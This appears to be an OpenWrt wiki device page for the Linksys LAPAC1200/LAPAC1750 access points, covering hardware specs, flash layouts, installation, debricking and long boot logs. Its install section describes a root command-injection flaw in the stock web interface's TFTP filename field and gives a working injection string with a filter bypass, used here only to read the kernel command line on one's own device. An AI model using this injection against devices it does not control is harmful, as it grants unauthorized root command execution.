Linksys LAPAC1200/LAPAC1750[C]

Under Construction!
This page is currently under construction. You can edit the article to help completing it.

The Linksys LAPAC1200 and LAPAC1750 are dual band wireless AC access points with PoE. They use either the QCA9557 or QCA9558 and have a 2×2:2 and 3×3:3 configuration, respectively. The variants with a C suffix are cloud managed versions that only differ in their software.

Work in Progress

Initial Pull Request

Model	CPU	Ram	Flash	Network	WLAN	Serial
LAPAC1200	Qualcomm Atheros QCA9558	128 MiB	16 MiB	1x 10/100/1000	2.4GHz: QCA9558 2×2:2 b/g/n, 5GHz: QCA9880 a/n/ac 2×2:2	3.3V 115200 8N1
LAPAC1750	Qualcomm Atheros QCA9558	128 MiB	16 MiB	1x 10/100/1000	2.4GHz: QCA9558 3×3:3 b/g/n, 5GHz: QCA9880 a/n/ac 3×3:3	3.3V 115200 8N1

From Stock Firmware Web Interface

Note: The C variants of these devices expect a GPG signed firmware and will not accept the factory image in the web interface. Use the Debricking machanism to install the factory image instead.

There are two firmware slots on the device. Due to the limited flash size, expected partitioning layout by the bootloader and the fixed device tree, OpenWrt can only be installed into the first slot. When applying the factory image to the second slot, OpenWrt will attempt to boot but fail to find its rootfs. This results in soft bricking the device with an endless boot loop. See Debricking for how to recover from such a state. It is therefore important to check which slot the stock firmware was booted from before applying the factory image.

The web interface of the stock firmware can be exploited to run arbitrary commands as root. This allows for inspecting the current kernel command line. Commands can be injected via the TFTP filenames in the web interface. The input is partially sanitized on the client side, disallowing any `;` characters and partially transformed on the host side, replacing any forward slashes. Both can be worked around by using `||` and `&&` for command chaining and expressions for the forward slash.

Commands can be most easily injected under Configuration → Administration → SSL Certificate by putting encoded commands into the Destination File under Export SSL Certificate to TFTP Server. A dummy address has to be supplied for the TFTP Server field as well. The output of the injected command is then shown as plain text between the tftp usage text and the HTML for the page. The slot of the currently booted stock firmware can be determined by looking at /proc/cmdline. Dump the current command line by injecting the command:

' || S=${PWD%u*} && ${S}bin${S}cat ${S}proc${S}cmdline #

Usage: tftp [OPTION]... HOST [PORT]

console=ttyS0,115200 root=31:03 rootfstype=squashfs init=/sbin/init mem=64m mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),1216k(kernel),5952k(fs),512k(Log),64k(NVRAM),64k(NVRAM_bak),64k(calibration),1216k(kernel_2),5952k(fs_2)
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
...

If the root parameter points to 31:03, the firmware is running from the first slot. Flashing the factory image now would result in soft bricking the device. Install a stock firmware image first. If it points to 31:09 instead, the firmware is running from the second slot and the factory image can be applied.

From Bootloader Recovery

Use the Debricking machanism to install the factory image.

Hold reset button while powering up until the LEDs flash red/blue
Use recovery tool to flash either a stock or OpenWrt factory image

The default network configuration is:

Interface Name	Description	Default configuration
br-lan	LAN & WiFi	DHCP

The Linksys LAPAC1750 has the following buttons:

BUTTON	Event
Reset	reset

Architecture	MIPS 74Kc
Vendor	Qualcomm
Bootloader	Custom U-Boot 1.1.4 with Sercomm Boot Version 2.02.0
System-On-Chip	Qualcomm Atheros QCA9557 (LAPAC1200) or QCA9558 (LAPAC1750)
CPU/Speed	720 MHz
Flash-Chip	Macronix MX25L12835FMI
Flash size	16 MiB
RAM	128 MiB 2x EtronTech EM68B16CWQH-25H
Wireless	2.4GHz QCA955x b/g/n 2×2 or 3×3, 5GHz QCA9880 a/n/ac 2×2:2 or 3×3:3
Ethernet	10/100/1000 Mbit/s QCA9558 with Atheros AR8035 PHY
Serial	Yes unpopulated, 3.3V 115200 8N1
JTAG	unknown

The stock flash layout is:

Layer0	raw flash
Layer1	u-boot	u-boot-env	kernel	fs	Log	NVRAM	NVRAM_bak	calibration	kernel_2	fs_2

The OpenWrt flash layout is:

Layer0	raw flash
Layer1	u-boot	u-boot-env	fwconcat0	art	fwconcat1
Layer2			mtd-concat
Layer3			loader	kernel	rootfs
Layer4			loader	kernel	rootfs	rootfs_data

There are 5 tamper resistant T15 screws, one hidden behind the label. Each corner also has plastic clips holding the cover. Take care when removing the cover as the 6 PCB antennas are glued to it and the cables are too short to fully remove.

How to connect to the Serial Port of this specific device:

Serial connection parameters for Linksys LAPAC1750	115200, 8N1, 3.3V

→ port.jtag general information about the JTAG port, JTAG cable, etc.

U-Boot 1.1.4 (Jan 24 2014 - 13:18:57) ap135 - Scorpion 1.0DRAM: sri Scorpion 1.0 ath_ddr_initial_config(200): (32bit) ddr2 init tap = 0x00000003 Tap (low, high) = (0x4, 0x1e) Tap values = (0x11, 0x11, 0x11, 0x11) 128 MB Top of RAM usable for U-Boot at: 88000000 Reserving 344k for U-Boot at: 87fa8000 Reserving 192k for malloc() at: 87f78000 Reserving 44 Bytes for Board Info at: 87f77fd4 Reserving 36 Bytes for Global Data at: 87f77fb0 Reserving 128k for boot params() at: 87f57fb0 Stack Pointer at: 87f57f98 Now running in RAM - U-Boot at: 87fa8000 Flash Manuf Id 0xc2, DeviceId0 0x20, DeviceId1 0x18 flash size 16MB, sector count = 256 Flash: 16 MB *** Warning *** : PCIe WLAN Module not found !!! In: serial Out: serial Err: serial Net: ath_gmac_enet_initialize... athrs_sgmii_res_cal: cal value = 0xe ath_gmac_enet_initialize: reset mask:c02200 Scorpion ----> S17 PHY * athrs17_reg_init: complete Force MAC0 as RGMII link up! : cfg1 0x80000000 cfg2 0x7214 eth0: 58:ef:68:b2:d9:f7 eth0 up Max resets limit reached exiting... athr_gmac_sgmii_setup SGMII done : cfg1 0x800c0000 cfg2 0x7214 eth1: 58:ef:68:b2:d9:f7 eth1 up eth0, eth1 Setting 0x18116290 to 0x458ba14f Hit any key to stop autoboot: 0 Flash Sector Number : 256. *************************************************** Sercomm Boot Version 2.02.0 *************************************************** Get boot flag: 0x11 Begin to verify the backup image... ok! Entering Firmware : Everything is OK. ### main_loop: bootcmd="bootm 0x9f800100" ## Booting image at 9f800100 ... Image Name: Linux Kernel Image Created: 2016-06-08 9:21:12 UTC Image Type: MIPS Linux Kernel Image (gzip compressed) Data Size: 1158024 Bytes = 1.1 MB Load Address: 80002000 Entry Point: 801bc940 Verifying Checksum at 0x9f800140 ...OK Uncompressing Kernel Image ... OK No initrd ## Transferring control to Linux (at address 801bc940) ... ## Giving linux memsize in bytes, 134217728 Starting kernel ... Booting QCA955x Linux version 2.6.31-svn2491 (root@ubuntu) (gcc version 4.3.3 (GCC) ) #37 Wed Jun 8 09:30:14 CST 2016 flash_size passed from bootloader = 16 prom_init(87), boot_flag 11, to boot backup fs prom_init(94)kylin debug: project flag 02, cmdline: console=ttyS0,115200 root=31:09 rootfstype=squashfs init=/sbin/init mem=64m mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),1216k(kernel),5952k(fs),512k(Log),64k(NVRAM),64k(NVRAM_bak),64k(calibration),1216k(kernel_2),5952k(fs_2) CPU revision is: 00019750 (MIPS 74Kc) cpu apb ddr apb ath_sys_frequency: cpu 720 ddr 600 ahb 200 Determined physical RAM map: memory: 02000000 @ 00000000 (usable) User-defined physical RAM map: memory: 04000000 @ 00000000 (usable) Initrd not found or empty - disabling initrd Zone PFN ranges: Normal 0x00000000 -> 0x00004000 Movable zone start PFN for each node early_node_map[1] active PFN ranges 0: 0x00000000 -> 0x00004000 Built 1 zonelists in Zone order, mobility grouping on. Total pages: 16256 Kernel command line: console=ttyS0,115200 root=31:09 rootfstype=squashfs init=/sbin/init mem=64m mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),1216k(kernel),5952k(fs),512k(Log),64k(NVRAM),64k(NVRAM_bak),64k(calibration),1216k(kernel_2),5952k(fs_2) PID hash table entries: 256 (order: 8, 1024 bytes) Dentry cache hash table entries: 8192 (order: 3, 32768 bytes) Inode-cache hash table entries: 4096 (order: 2, 16384 bytes) Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes. Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes Writing ErrCtl register=00000000 Readback ErrCtl register=00000000 Memory: 48084k/65536k available (1786k kernel code, 17384k reserved, 434k data, 148k init, 0k highmem) NR_IRQS:128 plat_time_init: plat time init done Calibrating delay loop... 359.42 BogoMIPS (lpj=718848) Mount-cache hash table entries: 512 ****************ALLOC*********************** Packet mem: 80264800 (0xe00000 bytes) ******************************************** NET: Registered protocol family 16 ath_pcibios_init: bus 0 ath_pcibios_init(250): PCI 0 CMD write: 0x356 registering PCI controller with io_map_base unset ath_pcibios_init: bus 1 ***** Warning PCIe 1 H/W not found !!! registering PCI controller with io_map_base unset bio: create slab <bio-0> at 0 pcibios_map_irq: IRQ 75 for bus 0 NET: Registered protocol family 2 IP route cache hash table entries: 1024 (order: 0, 4096 bytes) TCP established hash table entries: 2048 (order: 2, 16384 bytes) TCP bind hash table entries: 2048 (order: 1, 8192 bytes) TCP: Hash tables configured (established 2048 bind 2048) TCP reno registered NET: Registered protocol family 1 ATH GPIOC major 0 squashfs: version 4.0 (2009/01/31) Phillip Lougher JFFS2 version 2.2 (NAND) (ZLIB) (RTIME) (c) 2001-2006 Red Hat, Inc. msgmni has been set to 94 io scheduler noop registered io scheduler deadline registered (default) Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled serial8250.0: ttyS0 at MMIO 0xb8020000 (irq = 19) is a 16550A console [ttyS0] enabled brd: module loaded SLIP: version 0.8.4-NET3.019-NEWTTY (dynamic channels, max=256). CSLIP: code copyright 1989 Regents of the University of California. 10 cmdlinepart partitions found on MTD device ath-nor0 Creating 10 MTD partitions on "ath-nor0": 0x000000000000-0x000000040000 : "u-boot" 0x000000040000-0x000000050000 : "u-boot-env" 0x000000050000-0x000000180000 : "kernel" 0x000000180000-0x000000750000 : "fs" 0x000000750000-0x0000007d0000 : "Log" 0x0000007d0000-0x0000007e0000 : "NVRAM" 0x0000007e0000-0x0000007f0000 : "NVRAM_bak" 0x0000007f0000-0x000000800000 : "calibration" 0x000000800000-0x000000930000 : "kernel_2" 0x000000930000-0x000000f00000 : "fs_2" GACT probability on Mirror/redirect action on u32 classifier Performance counters on input device check on Actions configured TCP cubic registered NET: Registered protocol family 17 802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com> All bugs added by David S. Miller <davem@redhat.com> athwdt_init: Registering WDT success ath_otp_init: Registering OTP success VFS: Mounted root (squashfs filesystem) readonly on device 31:9. Freeing unused kernel memory: 148k freed Hey, here init started: BusyBox v1.1.0 (2013.09.05-11:58+0000) multi-call binary init started: BusyBox v1.1.0 (2013.09.05-11:58+0000) multi-call binary Starting pid 19, console /dev/console: '/etc/rcS' Tue Jan 1 01:01:00 UTC 2013 /usr/sbin/rc init Running............ Loading LED Module... Loading Ethernet Driver... qca955x_GMAC: Length per segment 1536 955x_GMAC: qca955x_gmac_attach 955x_GMAC: qca955x_set_gmac_caps Currently in polling mode unit0 mac0 registering f1e ..... qca955x_GMAC: RX TASKLET - Pkts per Intr:160 qca955x_GMAC: Mac address for unit 0:bfff0000 qca955x_GMAC: ff:ff:ff:ff:ff:ff qca955x_GMAC: Max segments per packet : 1 qca955x_GMAC: Max tx descriptor count : 128 qca955x_GMAC: Max rx descriptor count : 224 qca955x_GMAC: Mac capability flags : 42200 955x_GMAC: qca955x_gmac_attach 955x_GMAC: qca955x_set_gmac_caps Currently in polling mode unit1 qca955x_GMAC: RX TASKLET - Pkts per Intr:160 qca955x_GMAC: Mac address for unit 1:bfff0006 qca955x_GMAC: ff:ff:ff:ff:ff:ff MAC:1 Warning: Phy not found!!! qca955x_GMAC: Max segments per packet : 1 qca955x_GMAC: Max tx descriptor count : 128 qca955x_GMAC: Max rx descriptor count : 224 qca955x_GMAC: Mac capability flags : 42200 955x_GMAC: Serdes PLL is locked value 0x1f018116 Loading Push Button Module... /usr/sbin/pb_ap Running............ /usr/sbin/rc start Running............ ap_name=bridge,action=start br->multicast_v4=1, br->multicast_v6=1 ap_name=lan,action=start [ D ] athr_gmac_set_mac(1885) athr_gmac_ring_alloc Allocated 2048 at 0x83a1d800 sram_desc_cnt 1536,mac Unit 0,Tx r->ring_desc 0xbd000000 athr_gmac_ring_alloc Allocated 3584 at 0x83a23000 sram_desc_cnt 4224,mac Unit 0,Rx r->ring_desc 0xbd000600 955x_GMAC: eth0 in RGMII MODE Scorpion -----> 8035 PHY Setting Drop CRC Errors, Pause Frames and Length Error frames Setting PHY... phyUnit=0 ATHR_AUTONEG_ADVERT:DE1 ATHR_1000BASET_CONTROL:200 ATHR_PHY_CONTROL:1000 ATHRSF1_PHY: Port 0, Neg Success ATHRSF1_PHY: unit 0 phy addr 0 checking for the az feature of 8035... Disabling 802.3az feature... Restart auto-negotiation 955x_GMAC: Enet Unit:0 PHY:0 is UP eth0 RGMII 10Mbps full duplex 955x_GMAC: qca955x_soc_gmac_set_mac_duplex 955x_GMAC: qca955x_soc_gmac_set_link Done 955x_GMAC: done cfg2 0x7115 ifctl 0x0 miictrl Setting Drop CRC Errors, Pause Frames and Length Error frames 955x_GMAC: qca955x_soc_gmac_set_mac_duplex 955x_GMAC: qca955x_soc_gmac_set_link Done qca955x_GMAC:*********** LOOPBACK TEST 10Mbps PASS TX_INVT = 0 955x_GMAC: Enet Unit:0 PHY:0 is UP eth0 RGMII 100Mbps full duplex 955x_GMAC: qca955x_soc_gmac_set_mac_duplex 955x_GMAC: qca955x_soc_gmac_set_link Done 955x_GMAC: done cfg2 0x7115 ifctl 0x10000 miictrl Setting Drop CRC Errors, Pause Frames and Length Error frames 955x_GMAC: qca955x_soc_gmac_set_mac_duplex 955x_GMAC: qca955x_soc_gmac_set_link Done qca955x_GMAC:*********** LOOPBACK TEST 100Mbps PASS TX_INVT = 0 955x_GMAC: unit 0: phy 0 not up carrier 1 ether_ctrl=0 ether_speed=10Mbps ether_duplex=half duplex flow_control=0 phyUnit=0 ATHR_AUTONEG_ADVERT:DE1 ATHR_1000BASET_CONTROL:200 ATHR_PHY_CONTROL:1000 ATHRSF1_PHY: Port 0, Neg Success ATHRSF1_PHY: unit 0 phy addr 0 Flow control is disabled. ATH_MAC_TIMER: Port 0, Neg Success ATH_MAC_TIMER: unit 0 phy addr 0 Device eth0 port type is 0 device eth0 entered promiscuous mode ap_name=ip,action=start ap_name=passwd,action=create can't find this applicationap_name=ipv6,action=start ap_name=telnetd,action=start ap_name=ipmanage,action=start ap_name=httpd,action=start ap_name=ntp,action=restart killall: ntp: no process killed socket: Address family not supported by protocol socket: Address family not supported by protocol ap_name=whitelist,action=start /usr/sbin/manager init Running............ ap_name=wlan,action=start scfgmgr for local NOTE: GARP request is sent. adf: module license 'Proprietary' taints kernel. Disabling lock debugging due to kernel taint ath_hal: 0.9.17.1 (AR5416, AR9380, REGOPS_FUNC, WRITE_EEPROM, TX_DATA_SWAP, RX_DATA_SWAP, 11D) ath_dfs: Version 2.0.0 Copyright (c) 2005-2006 Atheros Communications, Inc. All Rights Reserved ath_rate_atheros: Copyright (c) 2001-2005 Atheros Communications, Inc, All Rights Reserved ath_spectral: Version 2.0.0 Copyright (c) 2005-2009 Atheros Communications, Inc. All Rights Reserved SPECTRAL module built on Jun 8 2016 17:22:42 ath_dev: Copyright (c) 2001-2007 Atheros Communications, Inc, All Rights Reserved 955x_GMAC: enet unit:0 is up... eth0 RGMII 1000Mbps full duplex 955x_GMAC: qca955x_soc_gmac_set_mac_duplex 955x_GMAC: qca955x_soc_gmac_set_link Done 955x_GMAC: done cfg2 0x7215 ifctl 0x10000 miictrl br0: port 1(eth0) entering learning state br0: port 1(eth0) entering forwarding state ath_ahb: 10.2.85 (Atheros/multi-bss) __ath_attach: Set global_scn[0] Enterprise mode: 0x43fc0000 Restoring Cal data from Flash SPECTRAL : get_capability not registered HAL_CAP_PHYDIAG : Capable SPECTRAL : Need to fix the capablity check for RADAR (spectral_attach : 231) SPECTRAL : get_capability not registered HAL_CAP_RADAR : Capable SPECTRAL : Need to fix the capablity check for SPECTRAL (spectral_attach : 236) SPECTRAL : get_capability not registered HAL_CAP_SPECTRAL_SCAN : Capable SPECTRAL : get_tsf64 not registered spectral_init_netlink 52 NULL SKB SPECTRAL : No ADVANCED SPECTRAL SUPPORT SPECTRAL :----- module attached Green-AP : Green-AP : Attached ath_get_caps[6105] rx chainmask mismatch actual 7 sc_chainmak 0 ath_get_caps[6080] tx chainmask mismatch actual 7 sc_chainmak 0 ath_attach_dfs[12493] dfsdomain 1 SPECTRAL : module already attached wifi0: Atheros ???: mem=0xb8100000, irq=2 ath_pci: 10.2.85 (Atheros/multi-bss) ath_pci_probe PCI device id is 003c :003c ath_pci 0000:00:00.0: ath DEBUG: sc=0x83a76000 ol_ath_pci_configure : num_desired MSI set to 0 Using PCI Legacy Interrupt __ol_ath_attach: ath_attach TODO __ol_ath_attach: dev name wifi1 ol_ath_attach() BMI inited. ol_ath_attach() BMI Get Target Info. ol_ath_attach() TARGET TYPE: 7 Vers 0x4100016c NUM_DEV=1 FWMODE=0x2 FWSUBMODE=0x0 FWBR_BUF 0 ol_ath_attach() configure Target . qc98xx_verify_checksum: flash checksum passed: 0x958d ol_transfer_bin_file 1792: Download Flash data len 2116 ol_transfer_bin_file 1739: Download Firmware data len 218164 dhcpc: stopping bonjour before apply the new ip. ap_name=mdns,action=stop deleting routers route: SIOC[ADD|DEL]RT: No such process NOTE: GARP request is sent. ol_ath_attach() Download FW. ol_ath_attach() HT Create . ol_ath_attach() HIF Claim. ol_ath_attach() BMI Done. ol_ath_attach() WMI attached. wmi_handle 82d40000 +HWT CE_recv_buf_enqueue 569 Populate last entry 512 for CE 5 CE_recv_buf_enqueue 578 CE 5 wi 511 dest_ptr 0x52e020 nbytes 0 recv_ctxt 0x83b8a460 -HWT ap_name=wins,action=restart HTC Service:0x0300 ep:1 TX flow control disabled CE_pkt_dl_len_set CE 4 Pkt download length 64 TXRX: Created pdev 83ad5a00 ap_name=ntp,action=restart ap_name=httpredirect,action=restart HTC Service:0x0100 ep:2 TX flow control disabled wmi_service_ready_event_rx: WMI UNIFIED SERVICE READY event num_rf_chain : 00000003 ht_cap_info: : 0000085b vht_cap_info : 338001b2 vht_supp_mcs : 0000ffea LARGE_AP enabled. num_peers 144, num_vdevs 16, num_tids 256 idx 0 req 1 num_units 0 num_unit_info 2 unit size 408 actual units 145 chunk 0 len 59160 requested ,ptr 0x2ea0000 FIRMWARE:P 145 V 16 T 443 FIRMWARE:_wlan_rtt_enable wmi_ready_event_rx: WMI UNIFIED READY event ol_ath_connect_htc() WMI is ready ol_ath_set_host_app_area TODO target uses HTT version 2.1; host uses 2.1 ol_ath_attach() connect HTC. ol_regdmn_start: reg-domain param: regdmn=0, countryName=, wModeSelect=FFFFFFFF, netBand=FFFFFFFF, extendedChanMode=0. ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2) flags 0x2150 ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4) flags 0xa0 ol_regdmn_init_channels: !avail mode 0x1f9001 (0x8) flags 0xc0 ol_regdmn_init_channels: !avail mode 0x1f9001 (0x20) flags 0xd0 ol_regdmn_init_channels: !avail mode 0x1f9001 (0x40) flags 0x150 ol_regdmn_init_channels: !avail mode 0x1f9001 (0x800) flags 0x10080 ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2000) flags 0x20080 ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4000) flags 0x40080 Add VHT80 channel: 5210 Add VHT80 channel: 5775 Skipping VHT80 channel 5825 ol_ath_phyerr_attach: called OL Resmgr Init-ed ol_if_spectral_setup SPECTRAL : get_capability not registered HAL_CAP_PHYDIAG : Capable SPECTRAL : Need to fix the capablity check for RADAR (spectral_attach : 231) SPECTRAL : get_capability not registered HAL_CAP_RADAR : Capable SPECTRAL : Need to fix the capablity check for SPECTRAL (spectral_attach : 236) SPECTRAL : get_capability not registered HAL_CAP_SPECTRAL_SCAN : Capable SPECTRAL : get_tsf64 not registered spectral_init_netlink 52 NULL SKB Green-AP : Green-AP : Attached Green-AP : Attached ol_if_dfs_setup: called ol_if_dfs_attach: called; ptr=82eb5974, radar_info=83a87c08 ol_ath_rtt_meas_report_attach: called ol_ath_attach() UMAC attach . ol_if_dfs_configure: called ol_if_dfs_configure: FCC domain ol_if_dfs_disable: called ol_ath_attach: Calling ol_if_dfs_configure __ol_ath_attach: init tx/rx TODO __ol_ath_attach: hard_header_len reservation 58 create auto power entry create wds_vlan_cfb entry ap_name=wscupnp,action=restart ap_name=mdns,action=restart Initializing Pktlogs for 11ac Module is already loaded. ath_attach_dfs[12493] dfsdomain 1 [ D ] ath_vap_create(1010) id 17 ATH_BCBUF 32 VAP device ath017 created Interface doesn't accept private ioctl... ForBiasAuto (8BE0): Operation not permitted DES SSID SET=........ Warning: Driver for device ath017 has been compiled with version 22 of Wireless Extension, while this program supports up to version 20. Some things may be broken... Warning: Driver for device ath017 has been compiled with version 22 of Wireless Extension, while this program supports up to version 20. Some things may be broken... Warning: Driver for device ath017 has been compiled with version 22 of Wireless Extension, while this program supports up to version 20. Some things may be broken... MAC Prefix: 58:ef:68, MAX Power[0]: 20 [ D ] ath_vap_create(1010) id 0 ATH_BCBUF 32 VAP device ath000 created Interface doesn't accept private ioctl... ForBiasAuto (8BE0): Operation not permitted DCS for CW interference mitigation: 0 DCS for WLAN interference mitigation: 0 WARNING: Fragmentation with HT mode NOT ALLOWED!! DES SSID SET=LinksysSMB24G Device ath000 port type is 0 device ath000 entered promiscuous mode br0: port 2(ath000) entering learning state br0: port 2(ath000) entering forwarding state Module is already loaded. isCountryCodeValid: EEPROM regdomain 0x0 ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2) flags 0x2150 ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4) flags 0xa0 ol_regdmn_init_channels: !avail mode 0x1f9001 (0x8) flags 0xc0 ol_regdmn_init_channels: !avail mode 0x1f9001 (0x20) flags 0xd0 ol_regdmn_init_channels: !avail mode 0x1f9001 (0x40) flags 0x150 ol_regdmn_init_channels: !avail mode 0x1f9001 (0x800) flags 0x10080 ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2000) flags 0x20080 ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4000) flags 0x40080 Add VHT80 channel: 5210 ath_ioctl: SIOC80211IFCREATE CALLED [ D ] ol_ath_vap_create(1453) id 17 ATH_BCBUF 16 wmi_unified_vdev_create_send: ID = 0 VAP Addr = 58:ef:68:b2:d9:f9: TXRX: Created vdev 82f69440 (58:ef:68:b2:d9:f9) Setting vdev param = 26, value = 147 Setting vdev param = 27, value = 295 Setting vdev param = 28, value = 300 VAP device ath117 created TXRX: ol_txrx_peer_find_add_id: peer 83ae9800 ID 320 vid 0 mac 58:ef:68:b2:d9:f9 TXRX: ol_txrx_peer_find_add_id: peer 83ae9800 ID 183 vid 0 mac 58:ef:68:b2:d9:f9 DES SSID SET=........ OL vap_stop + wmi_unified_vdev_stop_send OL vap_stop - STOPPED EVENT for vap 0 OL vap_start + OL vap_start - ol_vdev_start_resp_ev ol_ath_vap_join: join operation is only for STA/IBSS mode ol_ath_wmm_update: Setting vdev param = 3, value = 100 Notification to UMAC VAP layer FWLOG: [63584] WHAL_ERROR_RESET_CHANNF1 ( ) wmi_unified_vdev_stop_send STOPPED EVENT for vap 0 OL vap_stop + wmi_unified_vdev_stop_send OL vap_stop - STOPPED EVENT for vap 0 OL vap_start + OL vap_start - ol_vdev_start_resp_ev ol_ath_vap_join: join operation is only for STA/IBSS mode ol_ath_wmm_update: Setting vdev param = 3, value = 100 Notification to UMAC VAP layer Warning: Driver for device ath117 has been compiled with version 22 of Wireless Extension, while this program swmi_unified_vdev_stop_send upports up to veSTOPPED EVENT for vap 0 rsion 20. Some things may be broken... Warning: Driver for device ath117 has been compiled with version 22 of Wireless Extension, while this program supports up to version 20. Some things may be broken... Warning: Driver for device ath117 has been compiled with version 22 of Wireless Extension, while this program supports up to version 20. Some things may be broken... OL vap_stop + wmi_unified_vdev_stop_send OL vap_stop - STOPPED EVENT for vap 0 OL vap_stop + wmi_unified_vdev_stop_send OL vap_stop - STOPPED EVENT for vap 0 TXRX: ol_rx_peer_unmap_handler: peer 83ae9800 with ID 320 to be unmapped. TXRX: ol_rx_peer_unmap_handler: peer 83ae9800 with ID 183 to be unmapped. TXRX: ol_txrx_vdev_detach: deleting vdev object 82f69440 (58:ef:68:b2:d9:f9) MAC Prefix: 58:ef:68, MAX Power[1]: 19 ath_ioctl: SIOC80211IFCREATE CALLED [ D ] ol_ath_vap_create(1453) id 0 ATH_BCBUF 16 wmi_unified_vdev_create_send: ID = 0 VAP Addr = 58:ef:68:b2:d9:f9: TXRX: Created vdev 82f69200 (58:ef:68:b2:d9:f9) Setting vdev param = 26, value = 147 Setting vdev param = 27, value = 295 Setting vdev param = 28, value = 300 VAP device ath100 created TXRX: ol_txrx_peer_find_add_id: peer 83ae9800 ID 320 vid 0 mac 58:ef:68:b2:d9:f9 TXRX: ol_txrx_peer_find_add_id: peer 83ae9800 ID 183 vid 0 mac 58:ef:68:b2:d9:f9 Setting vdev param = 1a, value = 1 OL vap_stop + wmi_unified_vdev_stop_send OL vap_stop - STOPPED EVENT for vap 0 Setting vdev param = 12, value = 1 Setting vdev param = d, value = 1 Setting vdev param = 3, value = 100 ol_ath_desc_alloc_and_mark_for_mcast_clone: VAP Mcast to Unicast buffer allocated: 400 Setting vdev param = 2a, value = 1 ol_ath_vap_set_param: VAP param is now supported param:62 value:2 Setting vdev param = 26, value = 27 Setting vdev param = 27, value = 55 Setting vdev param = 28, value = 60 WARNING: Fragmentation with HT mode NOT ALLOWED!! DES SSID SET=LinksysSMB5G Setting vdev param = 1e, value = 1 OL vap_stop + wmi_unified_vdev_stop_send OL vap_stop - STOPPED EVENT for vap 0 OL vap_start + OL vap_start - ol_vdev_start_resp_ev ol_ath_vap_join: join operation is only for STA/IBSS mode ol_ath_wmm_update: Setting vdev param = 3, value = 100 Notification to UMAC VAP layer Device ath100 port type is 0 device ath100 entered promiscuous mode br0: port 3(ath100) entering learning state FWLOG: [87370] WAL_DBGID_BB_WDOG_TRIGGERED ( 0x1554a, 0x200008a, 0x0, 0xc ) br0: port 3(ath100) entering forwarding state ap_name=stp,action=start ap_name=lanDot1xSupp,action=start ap_name=wins,action=restart ap_name=sshd,action=start ap_name=mdns,action=restart ap_name=lldpd,action=restart ap_name=cplogo,action=start /usr/sbin/networkIntegrality Running.......... ap_name=syslogd,action=start ap_name=portal,action=start ap_name=portal_vlan,action=start ap_name=cluster,action=start ap_name=snmp,action=start

U-Boot 1.1.4 (Jan 24 2014 - 13:18:57) ap135 - Scorpion 1.0DRAM: sri Scorpion 1.0 ath_ddr_initial_config(200): (32bit) ddr2 init tap = 0x00000003 Tap (low, high) = (0x4, 0x1e) Tap values = (0x11, 0x11, 0x11, 0x11) 128 MB Top of RAM usable for U-Boot at: 88000000 Reserving 344k for U-Boot at: 87fa8000 Reserving 192k for malloc() at: 87f78000 Reserving 44 Bytes for Board Info at: 87f77fd4 Reserving 36 Bytes for Global Data at: 87f77fb0 Reserving 128k for boot params() at: 87f57fb0 Stack Pointer at: 87f57f98 Now running in RAM - U-Boot at: 87fa8000 Flash Manuf Id 0xc2, DeviceId0 0x20, DeviceId1 0x18 flash size 16MB, sector count = 256 Flash: 16 MB *** Warning *** : PCIe WLAN Module not found !!! In: serial Out: serial Err: serial Net: ath_gmac_enet_initialize... athrs_sgmii_res_cal: cal value = 0xe ath_gmac_enet_initialize: reset mask:c02200 Scorpion ----> S17 PHY * athrs17_reg_init: complete Force MAC0 as RGMII link up! : cfg1 0x80000000 cfg2 0x7214 eth0: 58:ef:68:b2:d9:f7 eth0 up Max resets limit reached exiting... athr_gmac_sgmii_setup SGMII done : cfg1 0x800c0000 cfg2 0x7214 eth1: 58:ef:68:b2:d9:f7 eth1 up eth0, eth1 Setting 0x18116290 to 0x458ba14f Hit any key to stop autoboot: 0 Flash Sector Number : 256. *************************************************** Sercomm Boot Version 2.02.0 *************************************************** Get boot flag: 0xff Begin to verify the default image... ok! Entering Firmware : Everything is OK. ### main_loop: bootcmd="bootm 0x9f050100" ## Booting image at 9f050100 ... Image Name: MIPS OpenWrt Linux-6.12.62 Created: 2025-12-23 16:45:24 UTC Image Type: MIPS Linux Kernel Image (lzma compressed) Data Size: 3323 Bytes = 3.2 kB Load Address: 80060000 Entry Point: 80060000 Verifying Checksum at 0x9f050140 ...OK Uncompressing Kernel Image ... OK No initrd ## Transferring control to Linux (at address 80060000) ... ## Giving linux memsize in bytes, 134217728 Starting kernel ... OpenWrt kernel loader for AR7XXX/AR9XXX Copyright (C) 2011 Gabor Juhos <juhosg@openwrt.org> Looking for OpenWrt image... found at 0xbf060000 Decompressing kernel... done! Starting kernel at 80060000... [ 0.000000] Linux version 6.12.62 (build@834b9a072102) (mips-openwrt-linux-musl-gcc (OpenWrt GCC 14.3.0 r32350+1-41a1874c70) 14.3.0, GNU ld (GNU Binutils) 2.44) #0 Tue Dec 23 16:45:24 2025 [ 0.000000] printk: legacy bootconsole [early0] enabled [ 0.000000] CPU0 revision is: 00019750 (MIPS 74Kc) [ 0.000000] MIPS: machine is Linksys LAPAC1750 [ 0.000000] SoC: Qualcomm Atheros QCA9558 ver 1 rev 0 [ 0.000000] Initrd not found or empty - disabling initrd [ 0.000000] OF: reserved mem: Reserved memory: No reserved-memory node in the DT [ 0.000000] Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes. [ 0.000000] Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes [ 0.000000] Zone ranges: [ 0.000000] Normal [mem 0x0000000000000000-0x0000000007ffffff] [ 0.000000] Movable zone start for each node [ 0.000000] Early memory node ranges [ 0.000000] node 0: [mem 0x0000000000000000-0x0000000007ffffff] [ 0.000000] Initmem setup node 0 [mem 0x0000000000000000-0x0000000007ffffff] [ 